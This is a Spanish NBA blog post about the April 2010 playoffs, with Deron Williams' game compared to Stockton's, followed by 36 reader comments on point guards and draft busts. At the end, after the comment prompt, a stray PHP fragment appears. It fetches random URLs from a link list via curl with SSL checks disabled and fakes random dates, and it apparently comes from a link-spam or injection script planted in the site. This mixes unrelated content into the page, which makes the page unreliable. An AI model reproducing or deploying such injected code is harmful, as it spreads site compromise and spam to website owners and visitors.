Playoffs 19/04/2010: La herencia de Stockton

20 de April de 2010 por TheDeerHunter

2 de Mayo de 1989. John Stockton se marca un partido de 34 puntos y 16 asistencias que no sirven para cerrar la victoria. 5 días antes, el día 27 de Abril había logrado un 30-14 que tampoco fueron suficientes. Las dos únicas ocasiones en la historia de la franquicia en las que alguien había pasado de los 30 puntos y 10 asistencias en postemporada, hasta anoche. Han pasado más de 20 años.

Deron Williams se cargó el equipo a la espalda en un momento especialmente delicado anímicamente. La baja confirmada de Okur, incluso para el mundial, es un mazazo en toda regla añadido a la inmensa dificultad que supone parar a Carmelo Anthony sin Kirilenko en cancha. Deron anotó y dirigió de manera casi rabiosa, involucrando a un mermado Boozer, a Millsap y lo que es más impresionante: a Korver, a CJ Miles e incluso a Kyrylo Fesenko que minimizó como pudo los graves daños que Nenê pudo causar en la pintura. 33 puntos y 14 asistencias que superan aquellas míticas actuaciones de Stockton. Más que nada porque ésta sí conlleva empatar una eliminatoria por la que muy pocos en Utah seguían apostando un duro.

En los Nuggets esta muestra de fortaleza mental les ha pillado con el paso cambiado. Supongo que es inevitable que las bajas del rival  como también la recuperación de Kenyon Martin hayan causado un cierto efecto pernicioso en ellos, a modo de relajación. Melo no fue el del primer partido y a pesar de sus nada desdeñables 32 puntos no estuvo bien y acabó desquiciado borrándose por faltas del momento decisivo por partido. JR Smith también nos mostró la peor cara de su irregularidad y la defensa en general fue bastante pobre. En principio siguen siendo favoritos pero les va a tocar sudar durante dos partidos en uno de los ambientes más hostiles de la liga. Toca viajar a Salt Lake y más le vale a Denver rascar algo de una visita que va a ser de todo menos viaje de placer.

En el otro partido de la jornada el animal de LeBron desniveló un choque en el que colectivamente estuvieron bastante mejor los Bulls que los Cavaliers. Como ya anticipábamos el otro día, los Bulls pudieron hacer daño cuidando muy bien el balón (4 pérdidas tan sólo frente a las 11 de los Cavs) y peleando bien por los rebotes (37 frente a los 36 de los Cavs) para evitar transiciones rápidas y hacer jugar a sus rivales lo más estático posible. No llegó a salir bien, porque además de que no existe una estrategia práctica para parar a LeBron, sonó la flauta con lanzamientos exteriores ajenos a su control. El 4 de 5 en triples de Jamario Moon y el 3 de 5 de Anthony Parker son casi como si les hubiera tocado la lotería a los Cavaliers. La suerte evitó que sirviera de algo el excepcional partido de Noah, Rose y  Luol Deng. Más allá del resultado que les fue esquivo, éste es el camino.

Y MAÑANA…

Viene otro día fuerte. Miami (o mejor dicho, Wade) tiene una oportunidad de oro para robar la ventaja de campo a los Celtics aprovechando la sanción a Kevin Garnett. Nash, Amare y compañía buscarán resarcirse de la sorprendente derrota de hace un par de días aunque deberán buscar soluciones para sujetar a Marcus Camby. Los Bucks apretarán los dientes como ellos saben para superar las dificultades e imponerse a los Hawks. Y finalmente, Kevin Durant buscará reencontrarse a sí mismo para poner en apuros a los actuales campeones.

Comenta

36 comentarios a esta entrada

  1. M dice:
    #1

    Tremebundo, que animalada.

      Citar

  2. sergio dice:
    #2

    Cada día tengo más claro que a los Cavs les puede bastar con este nivel para llevarse el anillo, que los Lakers son el equipo puntero que más puede incrementar su nivel (dudo que esten mostrando todas sus cartas), y que Orlando es el equipo más peligroso en un partido enrachado (como le entren los triples a Nelson/Carter/Lewis/Reddick t puedes echar a temblar)

    Una pena que Utah no pueda contar con Kirilenko y Okur, pero si son capaces de ganar los dos siguientes partidos en casa, se llevaran la serie. Aunque desde luego, Salt Lake no es lo que era hace poco tiempo… (aunque también los considero mejores visitantes)

      Citar

  3. pcerezo dice:
    #3

    Ojo a Orlando.
    33-14 Deron Williams. Es el mejor base de la Liga?

    Un saludo y ojo a Orlando…

    Pablo

      Citar

  4. Txusma dice:
    #4

    Derrick Rose ha tirado en los 2 partidos 6 tiros libres, es decir de la multitud de entradas que hace tan solo le han pitado falta en 3….
    Por Internet corre este video con un compendio de las posibles faltas que le hicieron en el primer partido y no le pitaron: http://www.youtube.com/watch?v=lpZBhaX1_wo.
    Esta claro que en la NBA hay que ser una estrella para tener algún tipo de protección. En un par de año cuando le piten todo a Rose será aún más grande.

      Citar

  5. LEmontus dice:
    #5

    Lo de que deron william es el mejor base de la NBA creo que está bastante claro, es más creo no hay uno que pueda hacerle sombra.

    Rose es un jugón ha gando un tiro medio en suspensión buenísimo y de sus entradas no hay mucho que decir problablemente el mejor en ese aspecto.

    Sin duda los dos mejores bases de la liga, ni de coña billups,rondo o otros bases están a su altura.

      Citar

  6. LEmontus dice:
    #6

    Por cierto parece mentira que bulls podría haber ganado hoy si no fuera por la aportación de jamario moon….. y EN TRIPLES¡¡ pero los grandes también tienen que tener suerte claro, digo lo de los triples porque moon es un triplista bastante malo.

      Citar

  7. sergio dice:
    #7

    Hombre, quizas Rose sea el mejor entrando a canasta… junto a Deron y Parker. El primero por físico y el segundo por habilidad.

    Creo que solo Paul en su mejor estado de forma es comparable a Deron. Son los dos más completos en cuanto a velocidad, físico, tiro y visión de juego (puede ser que Paul algo mejor en visión o anticipación y Williams en tiros)

      Citar

  8. Rompe dice:
    #8

    La verdad que de bases buenos está plagada la liga. Muchos como Paul, Billups, Rose, Williams, Nash o incluso Evans, Jennings, Collison o Curry te pueden salvar un partido con una genialidad. Sacar le mejor depende mucho del estado de forma de cada uno. Ahora mismo Williams es posiblemente el más en forma, pero Paul a principio de temporada también lo estaba, y Nash ha estado rayando a un altísimo nivel todo el curso…

      Citar

  9. TheDeerHunter dice:
    #9

    Para mí Chris Paul en condiciones normales es mejor base que Deron Williams.
    El único base que está en condiciones (y ya lo ha demostrado, que otros no) de discutir el MVP a LeBron, a Kobe o a Wade.

    Deron Williams también me encanta, como no puede ser de otra manera, pero si me dieran a elegir cualquier base para construir mi franquicia me quedaría con CP3 con los ojos cerrados.

      Citar

  10. kantonyo dice:
    #10

    Yo tambien opino que Deron, ahora mismo es el mejor base de la liga individualmente. Pero creo, que hoy por hoy, prefiero tener en mi equipo a Nash y Billups, porque además de sus virtudes, creo que hacen mejores a sus compañeros. Lo malo de estos dos, es que estan en el final de sus carreras y Deron tiene todo por delante.

      Citar

  11. LEmontus dice:
    #11

    Yo a billups lo veo muy sobrevalorado y no me gusta nada aunque admito que es un buen base. Pero decir que en tu equipo lo prefieres a D-will creo que es excesivo , lo de nash es más discutible porque ese si que te aporta mil cosas , pero tampoco deron manda.

    Txusma a billups le pasa todo lo contrario que a rose, le pitan faltas por cualquier cosa y tira muchos tiros libres por partido lo que aumenta consideráblemnte sus puntos.

      Citar

  12. Chris dice:
    #12

    Yo sobre quien es el mejor de los bases lo afrontaria en dos clasificaciones:
    *Bases veteranos: 1Nash 2Kidd 3Billups 4Andre Miller 5Baron Davis.
    *Bases + jovenes: 1ChrisPaul 2Deron Willliams 3Derrick Rose 4Tony Parker 5Rajon Rondo.
    Ahora mismo (en plenos PO) y con el estado de forma actual me quedaria con:
    1Nash 2Deron Willliams 3Kidd

      Citar

  13. kantonyo dice:
    #13

    Pues lo prefiero, por todo lo que ha demostrado, llevó a Detroit a un campeonato, 1 final y 3 finales de conferencia. Si consideras que esto es sobrevalorado, ya le gustará a Brandon Jennings llegar a un 10% de lo que ha conseguido Billups.

    Se marchó a Denver, y detroit se hundió en la miseria. El año pasado dió una lección impresionante a Chris Paul en playoffs y ha llevado a los Nuggets a ser candidatos en el oeste. Aunque repito, no creo que sea mejor individualmente que Deron, pero para mi equipo, en este momento lo prefiero, porque ya lo ha demostrado, sabe manejar el ritmo como nadie, sabe cuando tirar y sabe cuando le tiene que dar el balón a un compañero suyo, además de su valia como lider y su personalidad.

    Lo malo es que no creo que le queden más de dos años a buen nivel.

      Citar

  14. sergio dice:
    #14

    Hablando de Deron… no estaria mal recordar que Portland pudo elegirlo en el numero 3 del draft de ese año, pero cambió sus derechos por Linas Kleiza más una opción de draft de ese año en primera ronda (Webster) y una del año siguiente (Joel Freeland).

    Vamos, el ojo de siempre para los drafts….

      Citar

  15. sergio dice:
    #15

    Creo que Billups es el acompañamiento para una superestrella tipo Wade, Carmelo, Bryant o James porque no necesita absorber mucho juego para ser determinante. Como Utah no tiene ningún jugador de ese tipo, le viene mejor un Deron que es mejor individualmente…, por eso no me parece lógico decir que se prefiere a uno u a otro. Depende mucho de los jugadores que ya tengas.

      Citar

  16. wherenbahappens dice:
    #16

    Hola a todos/as!

    Si podéis, echádle un vistazo al blog: http://wherenbahappens.wordpress.com/
    Estoy empezando… a ver qué os parece.
    Saludos,

      Citar

  17. pcerezo dice:
    #17

    Lo de Billups sobrevalorado es un brindis al sol de mucho cuidado. Un tipo que ha sido campeón de la NBA siendo el MVP de las finales contra unos grandes Lakers, estuvo a punto de ganar otro anillo en el aquel quinto partido que Horry se volvio loco y metio 10 puntos seguidos, llegó a otra final de conferencia con Detroit y otra con Denver (mejorando mucho, mucho las prestaciones de su equipo). Estoy completamente seguro que Deron y Chris Paul firmaban ese curriculum ahora mismo.
    El ojo de Portland para los drafts son tremendos. Deron Williams-Brandon Roy-Durantula-Aldrige-Pivot, sería un posible quinteto tiular.

    Un salduo,
    Pablo

      Citar

  18. Txusma dice:
    #18

    Bueno hombre, no creo que tengáis que ser tan duro con los Blazers, en los últmos años en 4 elecciones se han sacado a Roy, Aldridge y Oden. Lo de este último es una auténtica pena que aunque había alguna probabilidad nadie esperaba. Los ratos que ha estado sano se ha visto a un jugador con un potencial enorme…
    Y ahora que viene a cuento, aquí va un link con los mejores y los peores equipos drafteando entre 1989 y 2008. Como toda lista pueda dar lugar a interpretaciones para parece algo suficientemente objetivo como para tenerlo en cuenta: http://www.82games.com/bestdraftingteams.htm
    Q equipo diríais que es el mejor? Y el peor?

      Citar

  19. sergio dice:
    #19

    De hecho estoy escribiendo la lista de las 10 peores elecciones de draft de la historia… Y si, sigo pensando que Portland no tiene precisamente una “flor en el culo” en el sorteo universitario

      Citar

  20. sergio dice:
    #20

    Muy curioso el articulo que citas Txus… y aún más el que enlaza en la parte final del mismo, intentando ordenar estadísticamente las mejores y peores elecciones del draft en los últimos 20 años.

    Se podría hacer un equipazo con sólo jugadores elegidos por debajo del puesto 40:

    Marc Gasol – 48º
    Luis Scola – 55º
    Manu Ginobili – 57º
    Monta Ellis – 40º
    Mo Williams – 47º

      Citar

  21. TheDeerHunter dice:
    #21

    jojojo y tan curioso

    aparece un nombre ilustre que me suena… un tran Fran Vasquez en el 7º puesto

    no está excesivamente actualizado, Ibaka no ha jugado ni un minuto en la lista… y Bargani, no creo que sea el 18º peor de la historia, quizás sí de los peores que han cobrado el pastizal que se ha embutxacado este año

      Citar

  22. sergio dice:
    #22

    Jod… Deer, es que Bargnani es un número 1 de Draft…. eso tiene ciertas responsabilidades. Quizás no sea un 18º histórico, pero es que la lista sólo habla de los últimos 20 años. Quizás no este tan lejos de ese puesto desde esa perspectiva

      Citar

  23. TheDeerHunter dice:
    #23

    y también un equipazo con jugadores top 10: XD
    Shawn Respert (8º)
    Bobby Hurley (7º)
    Nikoloz Tskitishvili (5º)
    Danny Ferry (2º)
    Pervis Ellison (1º)

    oléee

      Citar

  24. Uno cualquiera dice:
    #24

    Está actualizado hasta el 2008 y el mismo creador dice que jugadores como Bargnani, Oden o Tyrus Thomas deberían salir de ahí si siguen con la evolución que llevaban por aquel entonces.

      Citar

  25. LEmontus dice:
    #25

    Al Cesar lo que es del Cesar de momento en su temporada rookie jennings ya lo ha echo infinitamente mejor que Billups. Ya veremos donde está el techo del amigo, y que conste que ha sido mejor a nivel individual y colectivo sin estar en un equipo ganador a priori.

    Jennings ha tenido malos porcentajes en sun temporaa rookie, en un equipo del que ha tenido que tirar bastanes veces sólo, con mucha presión para un rookie en varias fases de la temporada.Pero es que billups tiene malos porcentajes un año sí y otro también. Es una apedreadora que tira muchos tiros libres, no digo que sea malo pero sí que está sobrevalorado. No digo ésto viendo solo promedios, también viendo la situación porque jugadores como kobe o roy si es lógico que tengan malos porcentajes y aun así creo que ninguno los tiene(CREO).

    lo de que no se puede

      Citar

  26. Txusma dice:
    #26

    Espero que hayas querido decir que Jennings lo ha hecho mejor que Billups en su temporada rookie. Si es así aún hay discusión aunque la explosión de Billups llegó cuando entró a formar parte de los Pistons. Un jugador tardío, vamos. Veremos si Jennings se lleva algún anillo en su carrera.

      Citar

  27. Viva_Dirk dice:
    #27

    Comparar los porcentajes de Billups y Jennings te va a salir mal, básicamente porque Billups no destaca por ser un anotador y Jennings si, asi que si desde la posición de base va a anotar mucho debe hacerlo con porcentajes mejores que los bases que se dedican mas a la distrubución y al liderazgo como Billups.

    Yo si tuviese que elegir a un base para que sea jugador franquicia, me quedaría con Rose.

      Citar

  28. LEmontus dice:
    #28

    No los he comparado y si los comparo no va a salir mal por supuesto que no ,billups tiene un 41% en su carrera(39% en su temporada rookie). Aunque claro le salva sus buenas defensas sobre todo porque tampoco es que sea un execelente botador, ni se caractariza por dar muchas asistencias.(Aunque este aspecto depende mucho del equipo y con Melo es bastante difícil).

    Nadie sabe lo que conseguirá Jennings y todo depende de como se lo monte , que le respeten las lesiones y los equipos en los que juegue.

    Por cierto Jennings es un buen anotador pero también tiene un excelente manejo de balón y es un buen distribuidor, este año ha promediado casi 6 asistencias por partido en un equipo como bucks cuyas principales armas en ataque son aclarados para Bogut y Salmons o se la pega el propio Jennnings.

    El gran problema de Jennings son sus defensas contra bases grandes, problema que se agraba si el base postea ´´bien´´(Arenas Davis Rondo Andre).El otro gran problema es la selección de tiro muchas veces se le va la pinza cuando mete dos triples seguidos o dos canastas seguidas, pero ésto se arregla con el tiempo.

      Citar

  29. LEmontus dice:
    #29

    Yo también prefiero a Rose como base franquicia.(aunque me gusta más jennings xD).

      Citar

  30. sergio dice:
    #30

    Por una vez, y sin que sirva de precedente, estoy de acuerdo con LEmontus. No olvidemos que este año cumple 21 años…. y que su nivel ha sido muy alto para alguien de su edad. Creo que acabará siendo una estrella de la competición a penas que sepa controlar sus instintos. Yo no apostaria nada en su contra… simplemente me va a encantar ver su progresion a lo largo de estos años. Le deseo lo mejor por el bien de la NBA… independientemente de su inclusión en los Bucks.

      Citar

  31. pcerezo dice:
    #31

    Es buenísimo el artículo del draft. Yo creo que el equipo que ha escogido mejor en los últimos diez años ha sido sin duda San Antonio. Las elecciones de Ginobili y Parker son tremendas y la de Scola aunque saben que se equivocaron al traspasarlo posteriormente. Lo de los Clippers es de traca, por cierto alguién sabe donde coño está Olowokandi?

    Lemontus, sigo pensando que el humo ciega tus ojos.

    Pablo.

      Citar

  32. sergio dice:
    #32

    Olowokandi se retiro en el 2006 en los Celtics

      Citar

  33. TheDeerHunter dice:
    #33

    Billups tira mal, bota regular, no se caracteriza por dar asistencias… parece un paquete total, por lo que decís. Su currículum se lo ha traído papá noel o habrá hecho un pacto con el demonio.

    ya que estamos, de todos los que habéis nombrado, me quedo con Ridnour :S

      Citar

  34. pcerezo dice:
    #34

    Menudo prenda el Olowokandi…nº1 del draft…Y el contratito que le firmó McHale fue de risa…

      Citar

  35. sergio dice:
    #35

    Billups tiene casi un 39% de promedio en tiros de tres (54º en la historia), sólo 2 pérdidas por partido en 32 minutos, 5,4 asistencias sin absorber juego, 15,4 puntos, sube sus prestaciones Playoffs, y me atrevo a decir que es el único MVP de las Finales que nadie esperaba que llegara a serlo (quizás con otros como Worthy o Jo Jo White).

      Citar

  36. sergio dice:
    #36

    Por cierto, que acabo de leer el dato de que os parece raro que Anthony Parker tenga buen porcentaje en triples… yo particularmente lo veo como uno de los mejores tiradores de la liga en efectividad.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>